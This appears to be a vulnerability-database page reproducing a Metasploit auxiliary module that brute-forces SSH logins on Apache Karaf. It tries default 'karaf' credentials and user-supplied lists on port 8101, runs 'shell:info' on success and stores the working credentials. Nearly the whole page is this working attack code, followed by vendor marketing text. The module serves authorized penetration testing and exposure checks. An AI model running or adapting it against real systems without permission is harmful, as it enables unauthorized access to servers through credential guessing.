Lucene search
K

Apache Karaf Login Utility

🗓️ 25 Feb 2016 17:22:50Reported by Samuel Huckins, Brent Cook, Peer Aagaard, Greg Mikeska, Dev MohantyType 
metasploit
 metasploit
🔗 www.rapid7.com👁 22 Views

This module attempts to log into Apache Karaf's SSH. If the TRYDEFAULTCRED option is set, then it will also try the default 'karaf' credential

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'metasploit/framework/login_scanner/ssh'
require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::SSH::Options

  DEFAULT_USERNAME = 'karaf'
  DEFAULT_PASSWORD = 'karaf'

  def initialize
    super(
      'Name'        => 'Apache Karaf Login Utility',
      'Description' => %q{
        This module attempts to log into Apache Karaf's SSH. If the TRYDEFAULTCRED option is
        set, then it will also try the default 'karaf' credential.
      },
      'Author'      => [
          'Samuel Huckins',
          'Brent Cook',
          'Peer Aagaard',
          'Greg Mikeska',
          'Dev Mohanty'
      ],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        # TODO Set default user, pass
        Opt::RPORT(8101),
        OptBool.new('TRYDEFAULTCRED', [true, 'Specify whether to try default creds', true])
      ], self.class
    )

    register_advanced_options(
      [
        Opt::Proxies,
        OptBool.new('STOP_ON_SUCCESS', [ false, '', true]),
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rport
    datastore['RPORT']
  end

  def gather_proof
    proof = ''
    begin
      Timeout.timeout(5) do
        proof = ssh_socket.exec!("shell:info\n").to_s
      end
    rescue Timeout::Error
    end
    proof
  end

  def run_host(ip)
    @ip = ip
    print_status("Attempting login to #{ip}:#{rport}...")

    cred_collection = build_credential_collection(
      password: datastore['PASSWORD'],
      username: datastore['USERNAME']
    )

    if datastore['TRYDEFAULTCRED']
      if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?
        cred_collection.add_public(DEFAULT_USERNAME)
        cred_collection.add_private(DEFAULT_PASSWORD)
      else
        cred_collection.username = DEFAULT_USERNAME
        cred_collection.password = DEFAULT_PASSWORD
      end
    end

    scanner = Metasploit::Framework::LoginScanner::SSH.new(
      configure_login_scanner(
        host: ip,
        port: rport,
        cred_details: cred_collection,
        proxies: datastore['Proxies'],
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        connection_timeout: datastore['SSH_TIMEOUT'],
        framework: framework,
        framework_module: self,
      )
    )

    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
        module_fullname: self.fullname,
        workspace_id: myworkspace_id
      )
      case result.status
        when Metasploit::Model::Login::Status::SUCCESSFUL
          print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
          credential_core = create_credential(credential_data)
          credential_data[:core] = credential_core
          create_credential_login(credential_data)
        when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
          if /key length too short/i === result.proof.message
            vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof} (net/ssh out of date)"
          else
            vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof}"
          end

          scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
          invalidate_login(credential_data)
        when Metasploit::Model::Login::Status::INCORRECT
          vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
          invalidate_login(credential_data)
          scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
        else
          invalidate_login(credential_data)
          scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
      end
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 May 2024 12:00Current
7.3High risk
Vulners AI Score7.3
22